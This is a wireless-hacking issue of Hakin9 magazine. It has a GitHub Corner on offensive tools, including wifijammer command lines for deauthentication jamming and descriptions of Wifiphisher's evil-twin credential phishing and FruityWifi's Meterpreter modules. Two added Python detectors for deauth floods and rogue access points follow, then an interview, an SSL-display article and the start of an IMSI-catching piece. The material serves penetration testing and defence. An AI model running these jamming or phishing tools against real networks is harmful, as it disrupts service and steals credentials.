Wireless Hacking

This tool is created to aid penetration testers in assessing wireless security. It has automated attacks against WPA2 including a WPA2 hacking UI. It also implements a custom fake access point and integrates the Beef XSS framework and HTTP traffic viewing. Upcoming features include parsing t-shark logs and more attacks.

TEAM

Editor-in-Chief: Joanna Kretowicz, [email protected]

Editors: Marta Sienicka, [email protected]; Marta Strzelec, [email protected]; Marta Ziemianowicz, [email protected]

Proofreader: Lee McKenzie

Senior Consultant/Publisher: Paweł Marciniak

CEO: Joanna Kretowicz, [email protected]

Marketing Director: Joanna Kretowicz, [email protected]

DTP: Marta Sienicka, [email protected]

Cover Design: Hiep Nguyen Duc

Publisher: Hakin9 Media Sp. z o.o., 02-676 Warszawa, ul. Postępu 17D, Phone: 1 917 338 3631, www.hakin9.org

Proofreaders & Betatesters: Lee McKenzie, Avi Benchimol, Bernhard Waldecker, Hammad Arshed, Ivan Gutierrez Agramont, John Webb, Jose Luis Herrera, David von Vistauxx, Tom Updegrove, Diane Barrett, Felipe Martins, Gmn, K S Abhiraj, greg mckoy, Hani Ragab, Amit Chugh, Arthur Tumanyan, Da Co, devzero2000

All trademarks, trade names, or logos mentioned or used are the property of their respective owners.

The techniques described in our articles may only be used in private, local networks. The editors hold no responsibility for misuse of the presented techniques or consequent data loss.
Dear Readers!

We present to you a new issue of Hakin9! This time we decided to focus on one of the most popular topics: Wireless Hacking.

As always, we have prepared a few GitHub projects related to wireless hacking; I hope you will find them useful! Many of our articles relate to the main theme. You will have a chance to learn all about Aircrack-ng: Anthony Caldwell prepared a simple and informative guide dedicated to this tool. Carlos Manzo Trujillo will teach you how to use wireless techniques to hack drones. For those of you who have just started learning about wireless hacking, Uche Akajiuba will show you how to hack WPA2-PSK with Kali Linux. You don't want to miss it!

To take a break from wireless topics, Sumit Kumar Soni presents System Hardening tools and tips for Windows and Linux. Samrat Das wrote about CASB; if you don't know what it is, now is your chance to find out more about this fascinating topic.

Enjoy the issue,

Hakin9 Team
Contents

Github Corner: Wireless Hacking Edition (page 7)

"We created URH to be both, powerful and easy to use": interview with Johannes Pohl and Andreas Noack, creators of Universal Radio Hacker, by Marta Strzelec and Marta Sienicka (page 19)

The Development of Displaying SSL Certificates in a Browser, by Jindrich Zechmeister (page 23)

IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading, by Loay Abdelrazek (page 29)

Python - Practice and functionality, by Omar Ahmed (page 35)

CASB - Cloud Access Security Broker, by Samrat Das (page 50)

New hacking era: wireless hacking by drones, by Carlos Manzo Trujillo (page 60)

WIFI Hacking, by Pprasoon Nigam (page 81)

Wireless Hacking with Aircrack-ng, by Anthony Caldwell (page 99)

Hacking WPA2-PSK With Kali Linux, by Uche Akajiuba (page 106)

System Hardening Tools and Tips, by Sumit Kumar Soni (page 117)

Emulating Firmware for Blind Command Injection, by Nitesh Malviya (page 131)
GITHUB CORNER - WIRELESS HACKING EDITION

Infernal-Wireless: automated wireless hacking tool

##Infernal-Wireless v2.6 Release 2.6.11

##Features added and improved:

• Menu to retrieve logs is added

##Infernal-Wireless v2.6 Release 2.6.10

##Features added and improved:

• Added BeeF XSS framework Integration

• Added HTTP Traffic View within tool

• Improved Infernal Wireless Attack

• Visual View of some of the panels improved

• Improved Basic Authentication during Social engineering assessment over wireless network

Infernal-Wireless v2.6

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.

Usage: python InfernalWireless.py (from the same folder where your code exists)

For any comments and suggestions please email on 1337[@]gmail[dot]com

##BUG Fixes:

1. Non ASCII SSID Name used to crash the software. It is fixed now

2. Warnings in the background are suppressed

3. New Experimental Section is added but under development

Release Notes:

1. Better User Interface

2. More Network device controls

3. Better SSL Strip Control

4. User / Access Point Deauthentication with auto channel detection of AP

5. Extra Wireless Scanner to detect Probe Requests, wireless Network scan and connections to AP detection

6. airgraph-ng suite is better implemented

7. WPA2 Hacking UI is changed for better control over the attack

8. WPA2 Enterprise Hacking UI is changed for better control over the attack

9. Custom Fake Access Point is implemented. Freenet AP is deleted now.

10. Check for software updates

11. Wiki page with video links to attacks tutorials

12. Folders are more structured

13. Check for prerequisites automatically

Coming Soon:

• Parsing t-shark log files for gathering creds and more

• More attacks.

Expected bugs:

• Wireless card might not be supported

• Might crash on Windows

• Freeze

• A lot of work to be done, but this tool is still being developed.

More at: https://github.com/entropy1337/infernal-twin
RogueSploit: A Powerful WiFi Social Trap

RogueSploit is an open source automated script made to create a Fake Access Point, with dhcpd server, dns spoofing, host redirection, browser_autopwn1 or autopwn2 or beef+mitmf.

TO DO LIST:

• BeEF; [DONE]

• Add MITMF; [DONE]

• Add BDFProxy;

• Add SEToolkit;

• Use hostapd as FakeAP;

• Add some features;

ONLY FOR LEGAL / AUTHORIZED / STUDY PURPOSES

What you need:

• Aircrack-ng Suite [https://github.com/aircrack-ng/aircrack-ng]

• Dhcpd server

• Metasploit Framework [https://github.com/rapid7/metasploit-framework]

• Browser Exploitation Framework [https://github.com/beefproject/beef]

• dnsmasq

• GNU / Linux based Operating System [https://kali.org]

• External Wireless Interface like TP-Link TL-WN722N

• Zenity

• Hostapd

• Social Engineer Toolkit [https://github.com/trustedsec/social-engineer-toolkit]

• MITMF [https://github.com/byt3bl33d3r/MITMf]

DISCLAIMER

RogueSploit is intended to be used for legal security purposes only, and you should only use it to protect hosts you own or have permission to test. Any other use is not the responsibility of the developer. Be sure that you understand and are complying with the RogueSploit licenses and laws in your area. In other words, don't be stupid, don't be an asshole, and use this tool responsibly and legally.

More at: https://github.com/B4ckP0r7/RogueSploit
Wifijammer: Continuously Jam All Wifi Clients/Routers

Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block radius with heavy access point saturation. Granularity is given in the options for more effective targeting.

Requires: python 2.7, python-scapy, a wireless card capable of injection

Usage

Simple

python wifijammer.py

This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through.

Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses.

python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2

Deauthenticate all devices with which 00:0E:DA:DE:24:8E communicates and skips channel hopping by setting the channel to the target AP's channel (2 in this case). This would mainly be an access point's MAC so all clients associated with that AP would be deauthenticated, but you can also put a client MAC here to target that one client and any other devices that communicate with it.

Advanced

python wifijammer.py -c 1 -p 5 -t .00001 -s DL:3D:8D:JJ:39:52 -d --world

• -c, Set the monitor mode interface to only listen and deauth clients or APs on channel 1.

• -p, Send 5 packets to the client from the AP and 5 packets to the AP from the client along with 5 packets to the broadcast address of the AP.

• -t, Set a time interval of .00001 seconds between sending each deauth (try this if you get a scapy error like 'no buffer space').

• -s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a certain MAC address is handy in case you want to tempt people to join your access point in cases of wanting to use LANs.py or a Pineapple on them.

• -d, Do not send deauths to access points' broadcast address; this will speed up the deauths to the clients that are found.

• --world, Set the max channel to 13. In N. America the max channel standard is 11, but the rest of the world uses 13 channels so use this option if you're not in N. America.

More at: https://github.com/DanMcInerney/wifijammer
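The pattern described above (one unicast deauth in each direction plus one to the broadcast address per target, repeated on every channel hop) leaves a recognisable signature in a capture. Here is the defender's side of it, as an added example that is not code from wifijammer or from this issue: it flags a deauthentication flood from a list of decoded management-frame records and reports how much of it is addressed to broadcast. The frame records are constructed inline; the AP MAC is the one from the usage example above, the client MAC is made up, and the one-second window and threshold of ten frames are assumptions to tune per site.

```python
"""Flag 802.11 deauthentication / disassociation floods in decoded frame records.

Added example for this page (not part of wifijammer or of the Hakin9 issue).
Input records are constructed below in the shape a capture parser could emit:
(timestamp_ms, mgmt_subtype, src_mac, dst_mac, bssid, reason_code).
"""
from collections import defaultdict, deque

BEACON = 8      # IEEE 802.11 management frame subtypes
DISASSOC = 10
DEAUTH = 12
BROADCAST = "ff:ff:ff:ff:ff:ff"


def find_deauth_floods(frames, window_ms=1000, threshold=10):
    """Return {bssid: peak_count} for every BSSID whose deauth/disassoc frames
    reach `threshold` within any sliding window of `window_ms` milliseconds.
    A station leaving a network produces one or two such frames; a jammer
    produces dozens per second, so the count alone separates the two."""
    recent = defaultdict(deque)   # bssid -> timestamps still inside the window
    peaks = {}
    for ts, subtype, _src, _dst, bssid, _reason in sorted(frames, key=lambda f: f[0]):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_ms:   # drop timestamps that left the window
            q.popleft()
        if len(q) >= threshold:
            peaks[bssid] = max(peaks.get(bssid, 0), len(q))
    return peaks


def broadcast_share(frames, bssid):
    """Fraction of a BSSID's deauth/disassoc frames addressed to ff:ff:ff:ff:ff:ff.
    Tools that kick every client of an AP at once send to broadcast; an AP
    dropping a single station sends unicast."""
    mgmt = [f for f in frames if f[4] == bssid and f[1] in (DEAUTH, DISASSOC)]
    if not mgmt:
        return 0.0
    return sum(1 for f in mgmt if f[3] == BROADCAST) / len(mgmt)


def build_sample():
    """Constructed capture: two seconds of the three-frames-per-round jamming
    pattern against one AP, plus a beacon and one benign deauth on another network."""
    ap = "00:0e:da:de:24:8e"          # AP MAC taken from the wifijammer example above
    client = "5c:aa:fd:12:34:56"      # constructed client MAC
    frames = []
    for i in range(20):
        ts = i * 100                  # one round every 100 ms
        frames.append((ts, DEAUTH, ap, client, ap, 7))      # "from the AP" to the client
        frames.append((ts, DEAUTH, client, ap, ap, 7))      # "from the client" to the AP
        frames.append((ts, DEAUTH, ap, BROADCAST, ap, 7))   # to every client of the AP
    other_ap, other_sta = "a4:5e:60:11:22:33", "d8:0d:17:aa:bb:cc"   # constructed
    frames.append((700, BEACON, other_ap, BROADCAST, other_ap, 0))
    frames.append((750, DEAUTH, other_sta, other_ap, other_ap, 3))   # reason 3: station leaving
    return frames


if __name__ == "__main__":
    sample = build_sample()
    for bssid, peak in find_deauth_floods(sample).items():
        print(f"flood on {bssid}: peak {peak} deauth/disassoc frames in one window, "
              f"{broadcast_share(sample, bssid):.0%} to broadcast")
```

The flooded BSSID peaks at 33 frames per window (eleven rounds of three frames), a third of them to broadcast, while the network with a single departing station is never reported. The lasting fix is Protected Management Frames (IEEE 802.11w), which lets stations discard deauthentication frames that are not authenticated by the AP; this detector is for networks where PMF is not yet deployed.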
WiFiPhisher: Automated victim-customized phishing attacks against Wi-Fi clients

Wifiphisher is a security tool that mounts automated victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack that unlike other methods it does not include any brute forcing. It is an easy way for obtaining credentials from captive portals and third party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Wifiphisher works on Kali Linux and is licensed under the GPL license.

How it works

After achieving a man-in-the-middle position using the Evil Twin attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.

From the victim's perspective, the attack makes use in three phases:

1. Victim is being deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging "Deauthenticate" or "Disassociate" packets to disrupt existing associations.

2. Victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled by the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed.

3. Victim is being served a realistic specially-customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP & HTTPS requests. As soon as the victim requests a page from the Internet, wifiphisher will respond with a realistic fake page that asks for credentials or serves malware. This page will be specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.

Requirements

Following are the requirements for getting the most out of Wifiphisher:

• Kali Linux. Although people have made Wifiphisher work on other distros, Kali Linux is the officially supported distribution, thus all new features are primarily tested on this platform.

• One wireless network adapter that supports AP mode. Drivers should support netlink.

• One wireless network adapter that supports Monitor mode and is capable of injection. Again, drivers should support netlink. If a second wireless network adapter is not available, you may run the tool with the --nojamming option. This will turn off the de-authentication attack though.

More at: https://github.com/wifiphisher/wifiphisher
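Phase 2 above is the part a network owner can catch: the rogue copies the target's SSID and settings, so the SSID alone never identifies it, but its BSSID is not one you operate and, for a credential-harvesting portal, it usually runs open where the real network runs WPA2. The following is an added example, not code from wifiphisher or from this issue, that checks a scan result against an inventory of managed APs and reports evil-twin candidates with the reasons. The inventory, the scan entries and all MAC addresses are constructed; the locally-administered-MAC check uses the IEEE U/L bit (second-lowest bit of the first octet), which software-created virtual interfaces commonly set.

```python
"""Spot evil-twin candidates in a Wi-Fi scan against an inventory of managed APs.

Added example for this page (not part of wifiphisher or of the Hakin9 issue).
The inventory and the scan results below are constructed.
"""

# Constructed inventory of the APs we operate: SSID -> authorised BSSIDs and security.
INVENTORY = {
    "CorpWiFi": {"bssids": {"a4:5e:60:11:22:33", "a4:5e:60:11:22:34"}, "security": "WPA2-PSK"},
}

# Constructed scan results, as a site survey or a WIDS sensor would report them.
SCAN = [
    {"ssid": "CorpWiFi", "bssid": "a4:5e:60:11:22:33", "channel": 6, "security": "WPA2-PSK", "rssi": -48},
    {"ssid": "CorpWiFi", "bssid": "a4:5e:60:11:22:34", "channel": 11, "security": "WPA2-PSK", "rssi": -67},
    # Same SSID, same channel, software-generated MAC, no encryption: the evil-twin shape.
    {"ssid": "CorpWiFi", "bssid": "02:11:22:33:44:55", "channel": 6, "security": "OPEN", "rssi": -35},
    # A neighbour's network: not ours, so not a finding.
    {"ssid": "Cafe-Free", "bssid": "9c:3d:cf:00:11:22", "channel": 1, "security": "OPEN", "rssi": -80},
]


def is_locally_administered(mac):
    """True when the U/L bit of the first octet is set: the address was assigned
    by software rather than burned into the adapter."""
    return int(mac.split(":")[0], 16) & 0x02 != 0


def find_evil_twins(scan, inventory):
    """Return one finding per scanned AP that advertises a managed SSID but does
    not match the inventory, listing every reason it was flagged."""
    findings = []
    for ap in scan:
        known = inventory.get(ap["ssid"])
        if known is None:
            continue                      # not an SSID we are responsible for
        reasons = []
        if ap["bssid"] not in known["bssids"]:
            reasons.append("BSSID not in inventory")
            if is_locally_administered(ap["bssid"]):
                reasons.append("locally administered MAC")
        if ap["security"] != known["security"]:
            reasons.append(f"security {ap['security']} differs from expected {known['security']}")
        if reasons:
            findings.append({"ssid": ap["ssid"], "bssid": ap["bssid"],
                             "channel": ap["channel"], "rssi": ap["rssi"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_evil_twins(SCAN, INVENTORY):
        print(f"{f['ssid']} on {f['bssid']} (ch {f['channel']}, {f['rssi']} dBm): " + "; ".join(f["reasons"]))
```

Only the 02:11:22:33:44:55 entry is reported, with all three reasons. On the client side the equivalent protection is a profile that requires WPA2 for a known SSID, which makes an open twin of the same name a connection failure rather than a silent downgrade.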
FruityWifi: Wireless network auditing tool

FruityWifi is an open source tool to audit wireless networks. It allows the user to deploy advanced attacks by directly using the web interface or by sending messages to it.

Initially the application was created to be used with the Raspberry-Pi, but it can be installed on any Debian based system.

FruityWifi v2.0 has many upgrades. A new interface, new modules, Realtek chipsets support, Mobile Broadband (3G/4G) support, a new control panel, and more.

Now it is possible to use FruityWifi combining multiple networks and setups:

• Ethernet + Ethernet,

• Ethernet + 3G/4G,

• Ethernet + Wifi,

• Wifi + Wifi,

• Wifi + 3G/4G, etc.

Within the new options on the control panel we can change the AP mode between Hostapd or Airmon-ng allowing to use more chipsets like Realtek.

It is possible to customize each one of the network interfaces, which allows the user to keep the current setup or change it completely.

FruityWifi is based on modules making it more flexible. These modules can be installed from the control panel to provide FruityWifi with new functionalities.

Within the available modules you can find URLsnarf, DNSspoof, Kismet, mdk3, ngrep, nmap, Squid3 and SSLstrip (code injection functionality), Captive Portal, AutoSSH, Meterpreter, Tcpdump and more.

AutoSSH allows the user to create a reverse ssh connection, restarting it in case that the connection has been closed or dropped. It is useful to keep a permanent connection with FruityWifi.

Meterpreter is an outstanding tool to gather information from a compromised host, manipulate system processes and/or kill them, and more. This module allows FruityWifi to compromise more hosts and use them to access more devices and networks.

Nessus is a vulnerability scanner. With this module it is possible to scan hosts from FruityWifi without using the Nessus interface. We can discover the vulnerabilities present on each of the hosts to understand the attack surface and compromise them.

The main function of Tcpdump is to analyze network traffic. With this module we can intercept the traffic passing through the device, filter it and/or store it for post analysis.

Among the new features FruityWifi now supports Mobile Broadband (3G/4G). We can use this module to connect a 3G/4G dongle and give internet access to FruityWifi without the need of Wifi or Ethernet.

Ettercap is a tool able to capture network traffic and perform different attacks. With this module we can perform MITM attacks using ARP poisoning.

More at:

http://www.fruitywifi.com/index_eng.html

https://github.com/xtr4nge/FruityWifi
Universal Radio Hacker: investigate wireless protocols like a boss

The Universal Radio Hacker is a software for investigating unknown wireless protocols. Features include

• hardware interfaces for common Software Defined Radios

• easy demodulation of signals

• assigning participants to keep overview of your data

• customizable decodings to crack even sophisticated encodings like CC1101 data whitening

• assign labels to reveal the logic of the protocol

• fuzzing component to find security leaks

• modulation support to inject the data back into the system

Check out the wiki for more information and supported devices.

Like to see things in action? Watch URH on YouTube!

More at: https://github.com/jopohl/urh
"WE CREATED URH TO BE BOTH POWERFUL AND EASY TO USE"
INTERVIEW WITH JOHANNES POHL AND ANDREAS NOACK, CREATORS OF UNIVERSAL RADIO HACKER

[Hakin9 Magazine]: Hello Johannes and Andreas! Thank you for agreeing to the interview, we are honored! How have you been doing? Can you tell us something about yourself?

[Johannes Pohl]: I am a PhD student with a strong focus on offensive security. Programming Python is my passion next to working with Software Defined Radios and hacking wireless protocols or dealing with Artificial Intelligence.

[Andreas Noack]: I am a professor for communication systems at the University of Stralsund, dealing with IT security and cryptography for many years now. From my PhD thesis on, I am engaged with wireless security (wireless lan, meshing). Working with software defined radios was quite new to me as I have a strong cryptographic background.

[H9]: Can you tell us more about Universal Radio Hacker (URH)?

[JP]: The Universal Radio Hacker is a suite for investigating unknown wireless protocols. It helps you in many ways, from capturing the raw wireless signal over getting the bits out of the waveforms to reverse engineering the protocol's logic. Furthermore, you can apply fuzzing to your estimation of the protocol and penetrate innocent IoT devices.

[AN]: URH was first developed in 2014, at first under the name automatic hacker that we dropped before going to public. One of our main goals is to provide a user friendly way to analyze signals.

[H9]: Where did the idea of creating the Universal Radio Hacker come from?

[JP]: There was this one situation where we were sitting in front of a complex GNU Radio graph and thought to ourselves "Why does this have to be so complicated? We just want the bits!" At that time, we had to record a signal with GNU Radio, export it to WAV and open that WAV in audacity to manually count bits. This was kind of annoying, not speaking about the dependency hell involved to install GNU Radio at that time.

[AN]: As Johannes said, we just wanted to extract bits from a raw signal, although we didn't understand the HF black magic at that time. The basic idea was to enable theoretic researchers to deal with the physical, especially wireless, world without strong knowledge in electrical engineering.

[H9]: Who would you recommend URH to? Who do you think needs it the most, and why? Is it just people doing similar work to yours?

[JP]: URH may be useful for anyone dealing with wireless protocols: from the beginner, who wants to see the bits flying through the air, to the cryptographer assessing the security of an IoT protocol implementation.

[AN]: In the first line, URH was designed to support cryptographers and security researchers without deep HF knowledge in analyzing and pentesting proprietary digital wireless protocols. Providing an as-easy-as-possible interface for SDRs, URH is, of course, also suited for all the people that just like to play around with their IoT devices at home.

[H9]: What was the most challenging part in creating URH?

[JP]: GUI.

[AN]: Like summarized by Johannes, we had a lot of discussions about usability and the ergonomic design of URH. There was a lot of time going into graphical and usability features that seemed needless at the beginning. However, we are happy about the process when looking at the final outcome.

[H9]: What is needed to start using URH? How much knowledge do you have to possess to use it effectively?

[AN]: Well, some basic HF knowledge (i.e. you know that there are different wireless modulations, you know what 'sample rate' means) should be sufficient to start working with URH. We are trying to provide an easy access but working with SDRs can nevertheless become quite complex. Our philosophy is to provide a tradeoff between easy-to-use, i.e. only necessary options are shown by default, and a complex configuration to satisfy professionals at the same time. This is, however, not always that simple…

[JP]: As Andreas said, a basic understanding of HF is required. However, you may also use URH as a "learning by doing" tool, because we put a lot of effort into generating graphical previews and feedback. For example, you will see your signal oscillating faster in the preview, if you increase the frequency in the modulation dialog.

[Photo: Johannes Pohl (left), Prof. Dr. Andreas Noack (right)]

[H9]: What about the feedback from github community? Does it influence your software?

[JP]: Of course! The feedback of our community is important to us and has a great influence on the development. In the end, we created URH to be both, powerful and easy to use, and therefore are happy to see it used and have the ability to improve it.

[AN]: In the first years of URH, we only had our own viewpoints and technical demands. This changed with the release on GitHub. With all the feedback and features requests (not to forget bug reports) we are able to make URH more 'universal' to use.

[H9]: Have you found any aspect of working with a community difficult?

[JP]: I found the most challenging part to support the various combinations of operating systems and libraries used by community members. Maintaining a cross platform application is harder than it sounds, especially when it comes to compiling C++ extensions with different compilers and even varying standard libraries.

[AN]: There are two different worlds. On the one hand there are beginners, who are, for example, struggling with the installation or some basic functionalities of the program. On the other hand, there are professionals who ask for more features and more complex options. To meet the demands of both worlds, there are sometimes big discussions about whether a feature should be implemented or not.

[H9]: Any plans for the future? Are you planning to expand your tool, add new features?

[JP]: Currently, URH is released in versions 1.x.x.x. We have many plans for future major releases up to version 3.x. Great things are coming :-) Furthermore, we are planning to contribute some scientific papers about wireless reverse engineering and IoT security.

[AN]: To name one, we will get a simulator component in late 2017 that allows us to build a complete wireless protocol over several dependent messages including state machine. With this component, you are able to create, for example, a virtual IoT device that you can talk with, maybe to trigger cryptographic messages that can be cryptanalyzed offline.

[H9]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice?

[JP]: If you maintain an OpenSource project, use GitHub's awesome integrations! To name a few: TravisCI automatically tests (you follow TDD, right?) your code on each push in your Git repository, CodeClimate monitors the health of your code, e.g. how good your tests cover your code or how many code redundancies you have.

[AN]: A software you develop grows and becomes more complex. If a software reaches a particular size or complexity, you should think about software engineering techniques (e.g. test driven development, as Johannes already suggested). GitHub will support you with several plugins by doing that.

[H9]: Thank you!
THE DEVELOPMENT OF
DISPLAYING SSL CERTIFICATES IN
A BROWSER

by Jindrich Zechmeister

Displaying an SSL certificate in a browser is one of the aspects of using the internet. This originally unremarkable
problem has gradually become a big topic, which affects not only security, but marketing as well. Let us look at how
displaying SSL certificates in browsers has developed. You might be surprised how often this changes and how much it
has deviated from its original purpose.

The beginnings
Encrypting the web with an SSL certificate has its origins in the 1990s. One of the first certification authorities –
Thawte – was founded in 1995 and is still very popular today. The HTTP and HTTPS web protocols for encrypted web
have been with us (with forced modernization) for 20 years.

Connecting to the internet was not common for computer users at the time, and web encrypting was an exception.
Besides, until 2007, there were only two types of certificates – simple ones without information about the owner
(domain validated, DV), and certificates with verified information about the owner (organization validated, OV).

As a result, the lock icon appeared in the status bar (typically in Internet Explorer 7 and 8 browsers). The situation
started changing with new competition, and browsers started informing users about HTTPS more. In its first version
(2004), Firefox used a lock icon similar to Explorer, but later it highlighted certificates in blue.

In its very first version (2009), Chrome displayed certificates in a similar way. However, since it already supported
EV certificates, it could also show the details of the organization.

The arrival of EV certificates

In 2007, CAB forum (certification authority browser forum) released a new certificate type with extended verification.
Its main contribution was to display the name of the organization next to the address bar. This item is called “EV green
bar“ - and it really was green in the past.

In the older versions of Internet Explorer, the whole web address bar with an EV certificate had a green background.
This very noticeable feature was, unfortunately, used only in Microsoft browsers. Nowadays, the browsers do not


display a whole line with coloured background, but only a small part with the name of the organization next to the
address bar. This was probably the ideal version of displaying an EV certificate.

Recently, there has been a trend of “decoloring” the green bar, which was started by Mozilla. Their “green bar” has
been getting gradually lighter over the years, and now it is more white than green, with very subtle green text. For a
user, this is certainly less beneficial than in the past. Chrome has adopted this colouring and the originally green
address bar looks almost identical in both browsers.

The Development of Mobile Devices


After the introduction of the first iPhone in 2007, smartphones and later tablets grew in popularity. Most internet users
nowadays access the internet from a mobile device rather than a desktop. [1]

In mobile browser versions, a typical black lock usually symbolizes SSL certificates on a website. An EV certificate is
not displayed as a green bar but as the name of the organization in green font.

These days, mobile devices can deal with certificates without problems, the same as desktops. However, displaying the
certificate detail is more complicated because it is done by tapping the lock icon, which requires dexterity.

[1] See the statistics Desktop vs Mobile vs Tablet Market Share Worldwide, http://gs.statcounter.com/platform-market-share/desktop-mobile-tablet

Revolution of Microsoft with Edge


A true revolution, though not in a positive sense of the word, was caused by Microsoft's browser Edge. In 2015, Microsoft
released it as the successor to Internet Explorer, and it shocked, among other things, by not allowing the user to view
the details of a website's SSL certificate. Because the details cannot be viewed, the certificate's authentication aspect,
the data verified by a certification authority, is lost. You can see the name of the organization in a green bar only in
the case of EV certificates with extended verification.

Simplifying Security Indicators


At the end of 2016, Google published the results of a study, which was looking for ideal security symbols for security
warnings in a browser. Because of this study, three new symbols were created in order to simplify the browser
notifications. The survey established that for these symbols, the icon is significant, not the colour. It turned out that
browser users do not mind whether the warning is red, blue or black; the colour is not directly related to the character
of the message and the majority does not understand red as a warning. Therefore, Chrome focuses mainly on a clear
symbol and it displays one of three symbols for different statuses – a green lock, an informative “i” and a red triangle.

Firefox is planning to adopt the results of the study, but for now, it uses its own symbols. An average certificate is
displayed with a green lock, and an EV certificate has the name of the organization in green letters on a light bar.

Hiding the Certification Detail Due to Simplification


These days, we are witnessing the greatest simplification of browsers yet. Microsoft's Edge did not bother with
certificates and simply hid them: it is no longer possible to find information about a certificate. Google apparently took
inspiration and probably also believes that certificate details are not useful to the user. After clicking the green bar or
the lock icon, the certificate details are not shown; you have to press F12 to see them.

Mozilla does display the certificate detail, albeit after several clicks. However, if there is a security problem (e.g. if you
receive an untrustworthy certificate), there are problems with displaying it. The certificate is displayed in Base64,
which is too complicated for most users.


What next?
Securing websites is a hot topic now and certainly receives the most attention. Almost every internet user is nowadays
aware of how important it is to protect their personal and confidential information. After 10 years of EV certificates,
the market has reached the point where they are no longer used only by banks and financial institutions, and website
owners consider it a benefit to their visitors when the certificates' importance, from the authentication point of view,
is respected.

Therefore, it is surprising that browser producers have decided to remove certificate details, despite the fact that they
have tried to teach users for years to check their own security. One possible explanation might be the future
development of HTTP/2 and the fact that all domains will be secured by a certificate in the future. Nevertheless, even
then it will be desirable to check certificate information and origins on the website.

I hope that browser producers will notice these problems and go back to the conservative design. If that is not the
case, we will have to verify a website's certificate details with OpenSSL, which is not very user friendly.


ABOUT THE AUTHOR

Jindrich Zechmeister

SSL certificate specialist and manager of SSLmarket, a Symantec Website Security Platinum Partner. This highest level of partnership with the family of Symantec certification authorities proves our competence in the area of SSL certificate security and our ability not only to sell certificates but to bring added value to customers and help them with the complete security of their servers. SSLmarket is present in many countries, such as France, the UK, the USA, Germany and eastern Europe.

IMSI CATCHING OVER WIFI NETWORKS: EXPOSING WIFI-OFFLOADING

by Loay Abdelrazek
IMSI Catching Over WIFI Networks: Exposing WIFI-Offloading

Introduction
IMSI (International Mobile Subscriber Identity) catchers have been widely known in 3G mobile networks as malicious devices used to intercept and eavesdrop on mobile traffic and to track users; they are considered a type of man-in-the-middle attack. The same type of attack has now appeared in Wi-Fi networks as well.

Wi-Fi networks that operate over 2G-4G protocols, better known as Wi-Fi offloading, have been an emerging concept adopted by mobile operators for several years to relieve congested mobile data networks with additional capacity from the unlicensed Wi-Fi spectrum.

The Wi-Fi offloading architecture relies heavily on the mobile operator's infrastructure, as users are authenticated with their SIM/(U)SIM cards using the standard 3GPP mobile authentication mechanism.

The architecture of a Wi-Fi offloading solution consists mainly of the wireless access point that the user attaches to, backed by the operator's core infrastructure, which is responsible for authentication. The core side comprises an EAP-based AAA server connected to the operator's Home Location Register (HLR, the operator's database that stores the details of every authorized subscriber), a WLC (WLAN Controller) that acts as a DHCP server and leases IP addresses, and the GGSN (GPRS Gateway Serving Node) that acts as the gateway to the internet. The diagram below gives a high-level view of how much the Wi-Fi offloading architecture depends on the same core nodes as 3G/4G.

Fig 1. WiFi offloading Architecture

Traffic Flow
The sequential traffic flow for user equipment (UE) on a 3G/4G Wi-Fi network is as follows:
1. The subscriber associates to the SSID.
2. The UE sends an 802.1X EAP-SIM/AKA request to the AP.
3. The WLC sends a RADIUS authentication request.
4. The AAA server checks the SIM credentials with the HLR using MAP over the SS7 network.
5. After successful authentication, the WLC leases an IP address to the subscriber.
6. Subscriber traffic is now directed to the GGSN to obtain internet access.

WIFI offloading Authentication Vulnerability

EAP (Extensible Authentication Protocol) is a framework that allows new authentication methods to be defined and carried over RADIUS. EAP-SIM and EAP-AKA are two such methods, commonly used in WLANs.

EAP-SIM/AKA are designed for use with existing GSM/3GPP authentication systems (AuC, HLR/HSS) and
SIM/USIM cards. EAP-SIM/AKA standards allow WLAN users to authenticate access to wireless networks using
mobile SIM cards.

Fig 2. High Level Authentication Procedure (Source: Cisco Networks)

The above figure shows an overview of the authentication procedure. The UE communicates with an EAP server that is
located on an authentication server using AAA.

The first EAP request issued by the authenticator (EAP Server) is EAP-Request/Identity. On full authentication, the
UE’s EAP-Response/Identity includes the IMSI.

GSM subscribers are identified with IMSI. The IMSI is a string of not more than 15 digits. It is composed of a three
digit Mobile Country Code (MCC), a two or three digit Mobile Network Code (MNC), and a Mobile Subscriber
Identification Number (MSIN) of no more than 10 digits.

Fig 3. IMSI Structure


The vulnerability in this authentication mechanism is that the user identity is transported in clear text during the first handshake between the AAA server and the UE, so anyone in the vicinity of the access point can passively eavesdrop and capture the IMSI of the attached users. This is a weakness both in how mobile operators implement the architecture and in how EAP-SIM was standardized: as stated in the EAP-SIM RFC 4186, the identity privacy method is optional, so it is up to the operator whether to implement it.

